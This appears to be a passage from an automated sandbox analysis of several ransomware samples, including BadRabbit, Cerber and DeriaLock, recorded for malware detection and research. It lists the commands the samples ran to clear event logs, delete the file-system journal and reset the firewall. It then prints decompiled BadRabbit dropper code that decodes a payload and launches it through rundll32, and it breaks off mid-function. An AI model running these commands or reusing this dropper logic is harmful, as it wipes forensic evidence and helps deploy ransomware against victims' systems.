                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:48
                                                                                                                                                                                      Start time:14:50:14
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\wevtutil.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:wevtutil cl Setup
                                                                                                                                                                                      Imagebase:0x1100000
                                                                                                                                                                                      File size:167936 bytes
                                                                                                                                                                                      MD5 hash:27C3944EC1E3CAD62641ECBCEB107EE9
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:49
                                                                                                                                                                                      Start time:14:50:14
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"
                                                                                                                                                                                      Imagebase:0x1320000
                                                                                                                                                                                      File size:441899 bytes
                                                                                                                                                                                      MD5 hash:FBBDC39AF1139AEBBA4DA004475E8839
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:50
                                                                                                                                                                                      Start time:14:50:15
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:schtasks /Delete /F /TN drogon
                                                                                                                                                                                      Imagebase:0x9f0000
                                                                                                                                                                                      File size:185856 bytes
                                                                                                                                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:51
                                                                                                                                                                                      Start time:14:50:18
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:C:\Windows\system32\netsh.exe advfirewall reset
                                                                                                                                                                                      Imagebase:0x970000
                                                                                                                                                                                      File size:82944 bytes
                                                                                                                                                                                      MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:52
                                                                                                                                                                                      Start time:14:50:19
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff6da640000
                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:53
                                                                                                                                                                                      Start time:14:50:19
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\wevtutil.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:wevtutil cl System
                                                                                                                                                                                      Imagebase:0x1100000
                                                                                                                                                                                      File size:167936 bytes
                                                                                                                                                                                      MD5 hash:27C3944EC1E3CAD62641ECBCEB107EE9
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:54
                                                                                                                                                                                      Start time:14:50:19
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                                                      Imagebase:0x7ff603c50000
                                                                                                                                                                                      File size:51288 bytes
                                                                                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:55
                                                                                                                                                                                      Start time:14:50:19
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe"
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:119296 bytes
                                                                                                                                                                                      MD5 hash:41789C704A0EECFDD0048B4B4193E752
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:Borland Delphi

                                                                                                                                                                                      Target ID:56
                                                                                                                                                                                      Start time:14:50:20
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff6da640000
                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:57
                                                                                                                                                                                      Start time:14:50:21
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\wevtutil.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:wevtutil cl Security
                                                                                                                                                                                      Imagebase:0x1100000
                                                                                                                                                                                      File size:167936 bytes
                                                                                                                                                                                      MD5 hash:27C3944EC1E3CAD62641ECBCEB107EE9
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:58
                                                                                                                                                                                      Start time:14:50:22
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe"
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:320760 bytes
                                                                                                                                                                                      MD5 hash:FE1BC60A95B2C2D77CD5D232296A7FA4
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: cerber3, Description: Cerber3 , Source: 0000003A.00000000.343212020.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, Author: pekeinfo
                                                                                                                                                                                      • Rule: cerber3, Description: Cerber3 , Source: 0000003A.00000000.345008675.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, Author: pekeinfo
                                                                                                                                                                                      • Rule: cerber3, Description: Cerber3 , Source: 0000003A.00000000.339887192.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, Author: pekeinfo
                                                                                                                                                                                      • Rule: Cerber, Description: Cerber Payload, Source: 0000003A.00000002.357179404.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                                                                                                      • Rule: Cerber, Description: Cerber Payload, Source: 0000003A.00000002.352110846.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                                                                                                      • Rule: Cerber, Description: Cerber Payload, Source: 0000003A.00000002.357976764.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                                                                                                      • Rule: cerber3, Description: Cerber3 , Source: 0000003A.00000000.341491369.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, Author: pekeinfo

                                                                                                                                                                                      Target ID:59
                                                                                                                                                                                      Start time:14:50:23
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\wevtutil.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:wevtutil cl Application
                                                                                                                                                                                      Imagebase:0x1100000
                                                                                                                                                                                      File size:167936 bytes
                                                                                                                                                                                      MD5 hash:27C3944EC1E3CAD62641ECBCEB107EE9
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:60
                                                                                                                                                                                      Start time:14:50:23
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:taskkill /F /IM explorer.exe
                                                                                                                                                                                      Imagebase:0x990000
                                                                                                                                                                                      File size:74752 bytes
                                                                                                                                                                                      MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:62
                                                                                                                                                                                      Start time:14:50:24
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff6da640000
                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:63
                                                                                                                                                                                      Start time:14:50:25
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\fsutil.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:fsutil usn deletejournal /D C:
                                                                                                                                                                                      Imagebase:0xc0000
                                                                                                                                                                                      File size:145408 bytes
                                                                                                                                                                                      MD5 hash:140A43A2237D7D7497D4E0568B518B71
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:64
                                                                                                                                                                                      Start time:14:50:25
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                                                                      Imagebase:0x7ff6a1820000
                                                                                                                                                                                      File size:163336 bytes
                                                                                                                                                                                      MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                      Target ID:65
                                                                                                                                                                                      Start time:14:50:27
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe"
                                                                                                                                                                                      Imagebase:0xf80000
                                                                                                                                                                                      File size:495616 bytes
                                                                                                                                                                                      MD5 hash:0A7B70EFBA0AA93D4BC0857B87AC2FCB
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:.Net C# or VB.NET


                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                        Execution Coverage:3.9%
                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                        Signature Coverage:12.6%
                                                                                                                                                                                        Total number of Nodes:87
                                                                                                                                                                                        Total number of Limit Nodes:13

                                                                                                                                                                                        Callgraph

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E01321690(intOrPtr _a4, intOrPtr* _a8, char _a12, intOrPtr _a16) {
                                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                        				intOrPtr _v44;
                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                        				char _v60;
                                                                                                                                                                                        				void* _t24;
                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                        				intOrPtr* _t32;
                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v28 = _v28 & 0x00000000;
                                                                                                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                                                                                                        				_t32 = _a8;
                                                                                                                                                                                        				_v60 = _a12;
                                                                                                                                                                                        				_v56 = _a16;
                                                                                                                                                                                        				_v48 = _a4;
                                                                                                                                                                                        				_v44 =  *_t32;
                                                                                                                                                                                        				_t24 = E01322CA1( &_v60, "1.2.8", 0x38); // executed
                                                                                                                                                                                        				if(_t24 != 0) {
                                                                                                                                                                                        					return _t24;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t34 = E0132173C( &_v60, 4);
                                                                                                                                                                                        				if(_t34 == 1) {
                                                                                                                                                                                        					 *_t32 = _v40;
                                                                                                                                                                                        					_t29 = E01322BD0( &_v60);
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					E01322BD0( &_v60);
                                                                                                                                                                                        					if(_t34 == 2 || _t34 == 0xfffffffb && _v56 == 0) {
                                                                                                                                                                                        						_t29 = 0xfffffffd;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						_t29 = _t34;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t29;
                                                                                                                                                                                        			}















                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true
                                                                                                                                                                                        • Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        • Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        • Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID:
                                                                                                                                                                                        • String ID: 1.2.8
                                                                                                                                                                                        • API String ID: 0-509886058
                                                                                                                                                                                        • Opcode ID: 85caa745e6c977ff59b6f3a90de416b6d070c88323f63ca33e08ee15d727e1ac
                                                                                                                                                                                        • Instruction ID: 139aa2172d9432538c33c29fac1dec67baa720a80e7c256e3a65fede15726a6a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 85caa745e6c977ff59b6f3a90de416b6d070c88323f63ca33e08ee15d727e1ac
                                                                                                                                                                                        • Instruction Fuzzy Hash: 38113072D00229ABCF10FEACD985ADEBBF8AB14224F100526F911F7290E7709984CB91
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                                        			_entry_(void* __ebx) {
                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                        				short _v1568;
                                                                                                                                                                                        				short _v3128;
                                                                                                                                                                                        				char _v4688;
                                                                                                                                                                                        				int _v4692;
                                                                                                                                                                                        				char _v4696;
                                                                                                                                                                                        				char _v4700;
                                                                                                                                                                                        				struct _PROCESS_INFORMATION _v4716;
                                                                                                                                                                                        				struct _STARTUPINFOW _v4784;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				wchar_t* _t43;
                                                                                                                                                                                        				signed short* _t44;
                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                        				char* _t52;
                                                                                                                                                                                        				char* _t53;
                                                                                                                                                                                        				void* _t56;
                                                                                                                                                                                        				void* _t57;
                                                                                                                                                                                        				wchar_t* _t61;
                                                                                                                                                                                        				signed int _t63;
                                                                                                                                                                                        				signed int _t64;
                                                                                                                                                                                        				void* _t69;
                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t70;
                                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                                        				long _t74;
                                                                                                                                                                                        				wchar_t* _t78;
                                                                                                                                                                                        				wchar_t** _t79;
                                                                                                                                                                                        				signed int _t80;
                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t57 = __ebx;
                                                                                                                                                                                        				E01321660(0x12ac);
                                                                                                                                                                                        				_v8 =  *0x1328000 ^ _t80;
                                                                                                                                                                                        				_t79 = GetCommandLineW;
                                                                                                                                                                                        				_t78 = GetCommandLineW();
                                                                                                                                                                                        				if(_t78 != 0) {
                                                                                                                                                                                        					_v4692 = 0;
                                                                                                                                                                                        					_t79 = CommandLineToArgvW(GetCommandLineW(),  &_v4692);
                                                                                                                                                                                        					if(_t79 != 0) {
                                                                                                                                                                                        						if(_v4692 != 1) {
                                                                                                                                                                                        							_t43 = wcsstr(_t78,  *_t79);
                                                                                                                                                                                        							_t61 =  *_t79;
                                                                                                                                                                                        							_t81 = _t81 + 8;
                                                                                                                                                                                        							_t79 =  &(_t61[0]);
                                                                                                                                                                                        							do {
                                                                                                                                                                                        								_t74 =  *_t61;
                                                                                                                                                                                        								_t61 =  &(_t61[0]);
                                                                                                                                                                                        							} while (_t74 != 0);
                                                                                                                                                                                        							_t63 = _t61 - _t79 >> 1;
                                                                                                                                                                                        							_t44 = _t43 + _t63 * 2;
                                                                                                                                                                                        							if( *(_t43 + _t63 * 2) == 0x22) {
                                                                                                                                                                                        								_t44 =  &(_t44[1]);
                                                                                                                                                                                        							}
                                                                                                                                                                                        							if( *_t44 == 0x20) {
                                                                                                                                                                                        								_t44 =  &(_t44[1]);
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t73 =  &_v4688 - _t44;
                                                                                                                                                                                        							do {
                                                                                                                                                                                        								_t64 =  *_t44 & 0x0000ffff;
                                                                                                                                                                                        								 *(_t73 + _t44) = _t64;
                                                                                                                                                                                        								_t44 =  &(_t44[1]);
                                                                                                                                                                                        							} while (_t64 != 0);
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							_t56 = 0;
                                                                                                                                                                                        							do {
                                                                                                                                                                                        								_t5 = _t56 + 0x1326cf0; // 0x350031
                                                                                                                                                                                        								_t72 =  *_t5 & 0x0000ffff;
                                                                                                                                                                                        								 *(_t80 + _t56 - 0x124c) = _t72;
                                                                                                                                                                                        								_t56 = _t56 + 2;
                                                                                                                                                                                        							} while (_t72 != 0);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						if(GetSystemDirectoryW( &_v1568, 0x30c) != 0) {
                                                                                                                                                                                        							_t73 =  &_v1568;
                                                                                                                                                                                        							if(lstrcatW( &_v1568, L"\\rundll32.exe") != 0) {
                                                                                                                                                                                        								_t48 = E013210C0(_t57,  &_v4696, _t78,  &_v4700); // executed
                                                                                                                                                                                        								if(_t48 != 0) {
                                                                                                                                                                                        									_t49 = E01321260(_v4696, _v4700); // executed
                                                                                                                                                                                        									_t57 = _t57;
                                                                                                                                                                                        									if(_t49 != 0) {
                                                                                                                                                                                        										wsprintfW( &_v3128, L"%ws C:\\Windows\\%ws,#1 %ws",  &_v1568, L"infpub.dat",  &_v4688);
                                                                                                                                                                                        										_t69 = 0x10;
                                                                                                                                                                                        										_t52 =  &_v4716;
                                                                                                                                                                                        										do {
                                                                                                                                                                                        											 *_t52 = 0;
                                                                                                                                                                                        											_t52 = _t52 + 1;
                                                                                                                                                                                        											_t69 = _t69 - 1;
                                                                                                                                                                                        										} while (_t69 != 0);
                                                                                                                                                                                        										_t70 = 0x44;
                                                                                                                                                                                        										_t53 =  &_v4784;
                                                                                                                                                                                        										do {
                                                                                                                                                                                        											 *_t53 = 0;
                                                                                                                                                                                        											_t53 = _t53 + 1;
                                                                                                                                                                                        											_t70 = _t70 - 1;
                                                                                                                                                                                        										} while (_t70 != 0);
                                                                                                                                                                                        										_t73 =  &_v1568;
                                                                                                                                                                                        										_v4784.cb = 0x44;
                                                                                                                                                                                        										CreateProcessW( &_v1568,  &_v3128, _t70, _t70, _t70, 0x8000000, _t70, _t70,  &_v4784,  &_v4716); // executed
                                                                                                                                                                                        										ExitProcess(0); // executed
                                                                                                                                                                                        									}
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return E01321499(0, _t57, _v8 ^ _t80, _t73, _t78, _t79);
                                                                                                                                                                                        			}

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 013212DF
                                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 013212FC
                                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000), ref: 013212FF
                                                                                                                                                                                        • wcsstr.MSVCRT ref: 0132133D
                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 0132139B
                                                                                                                                                                                        • lstrcatW.KERNEL32(?,\rundll32.exe), ref: 013213B5
                                                                                                                                                                                        • wsprintfW.USER32 ref: 01321418
                                                                                                                                                                                        • CreateProcessW.KERNELBASE ref: 01321479
                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 01321481
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true
                                                                                                                                                                                        • Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        • Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        • Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CommandLine$Process$ArgvCreateDirectoryExitSystemlstrcatwcsstrwsprintf
                                                                                                                                                                                        • String ID: %ws C:\Windows\%ws,#1 %ws$D$\rundll32.exe$infpub.dat
                                                                                                                                                                                        • API String ID: 39178828-1758013632
                                                                                                                                                                                        • Opcode ID: ef03547e162009b1c6ee8890bb0a853a125c57e33677298a770b6f0b29e894cf
                                                                                                                                                                                        • Instruction ID: 6b68ee821735e95f880f170f63a649a1ffbaf026bebc80bff74d428326464e33
                                                                                                                                                                                        • Opcode Fuzzy Hash: ef03547e162009b1c6ee8890bb0a853a125c57e33677298a770b6f0b29e894cf
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1841A0719002289BDB35FF58DD55FEAB379EF44304F044199EA0AD7140EB749A94CF60
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        C-Code - Quality: 78%
                                                                                                                                                                                        			E013210C0(void* __ebx, long* __ecx, void* __edi, void** _a4) {
                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                        				short _v1568;
                                                                                                                                                                                        				long _v1572;
                                                                                                                                                                                        				WCHAR* _v1576;
                                                                                                                                                                                        				char _v1580;
                                                                                                                                                                                        				long* _v1584;
                                                                                                                                                                                        				void** _v1588;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                        				intOrPtr _t47;
                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                        				intOrPtr _t49;
                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                        				long _t56;
                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                        				int _t65;
                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                        				int _t67;
                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                        				intOrPtr _t69;
                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                        				long _t76;
                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                        				void _t85;
                                                                                                                                                                                        				void* _t89;
                                                                                                                                                                                        				void* _t91;
                                                                                                                                                                                        				void* _t92;
                                                                                                                                                                                        				void* _t95;
                                                                                                                                                                                        				void* _t97;
                                                                                                                                                                                        				signed int _t98;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t89 = __edi;
                                                                                                                                                                                        				_t66 = __ebx;
                                                                                                                                                                                        				_v8 =  *0x1328000 ^ _t98;
                                                                                                                                                                                        				_t86 =  &_v1568;
                                                                                                                                                                                        				_v1588 = _a4;
                                                                                                                                                                                        				_v1584 = __ecx;
                                                                                                                                                                                        				_v1576 = 0;
                                                                                                                                                                                        				if(GetModuleFileNameW(GetModuleHandleW(0),  &_v1568, 0x30c) == 0) {
                                                                                                                                                                                        					L17:
                                                                                                                                                                                        					return E01321499(0, _t66, _v8 ^ _t98, _t86, _t89, 0);
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t46 = E01321000( &_v1568,  &_v1572,  &_v1580); // executed
                                                                                                                                                                                        					if(_t46 == 0) {
                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						_t76 = _v1572;
                                                                                                                                                                                        						_t47 =  *((intOrPtr*)(_t76 + 0x3c));
                                                                                                                                                                                        						_t48 = _t47 + _t76;
                                                                                                                                                                                        						_t77 = ( *(_t47 + _t76 + 0x14) & 0x0000ffff) + _t48 + 0x18;
                                                                                                                                                                                        						_t88 =  *(_t48 + 6) & 0x0000ffff;
                                                                                                                                                                                        						if(_t88 > 0) {
                                                                                                                                                                                        							_t77 = _t77 + _t88 * 8;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t49 =  *((intOrPtr*)(_t48 + 0x98));
                                                                                                                                                                                        						_push(_t89);
                                                                                                                                                                                        						_t91 =  *((intOrPtr*)(_t77 - 0x28 + 0x14)) +  *((intOrPtr*)(_t77 - 0x28 + 0x10));
                                                                                                                                                                                        						if(_t49 == 0) {
                                                                                                                                                                                        							_t49 = _v1580;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_push(_t66);
                                                                                                                                                                                        						_t67 = _t49 - _t91;
                                                                                                                                                                                        						_t52 = RtlAllocateHeap(GetProcessHeap(), 0, _t67); // executed
                                                                                                                                                                                        						_t97 = _t52;
                                                                                                                                                                                        						if(_t97 == 0) {
                                                                                                                                                                                        							_pop(_t68);
                                                                                                                                                                                        							_pop(_t92);
                                                                                                                                                                                        							return E01321499(_v1576, _t68, _v8 ^ _t98, _t88, _t92, _t97);
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							memcpy(_t97, _t91 + _v1572, _t67);
                                                                                                                                                                                        							if(_t67 != 0) {
                                                                                                                                                                                        								_t85 =  *_t97;
                                                                                                                                                                                        								_t65 = _t67;
                                                                                                                                                                                        								do {
                                                                                                                                                                                        									_t85 = _t85 ^ 0x000000e9;
                                                                                                                                                                                        									_t65 = _t65 - 1;
                                                                                                                                                                                        								} while (_t65 != 0);
                                                                                                                                                                                        								 *_t97 = _t85;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t56 =  *_t97;
                                                                                                                                                                                        							_v1572 = _t56;
                                                                                                                                                                                        							_t58 = RtlAllocateHeap(GetProcessHeap(), 8, _t56); // executed
                                                                                                                                                                                        							 *_v1588 = _t58;
                                                                                                                                                                                        							if(_t58 == 0) {
                                                                                                                                                                                        								L14:
                                                                                                                                                                                        								_t69 = _v1576;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								_t28 = _t97 + 4; // 0x4
                                                                                                                                                                                        								_t88 = _t28;
                                                                                                                                                                                        								_t63 = E01321690(_t58,  &_v1572, _t28, _t67 + 0xfffffffc); // executed
                                                                                                                                                                                        								if(_t63 != 0) {
                                                                                                                                                                                        									goto L14;
                                                                                                                                                                                        								} else {
                                                                                                                                                                                        									_t88 = _v1572;
                                                                                                                                                                                        									 *_v1584 = _v1572;
                                                                                                                                                                                        									_t69 = 1;
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t97);
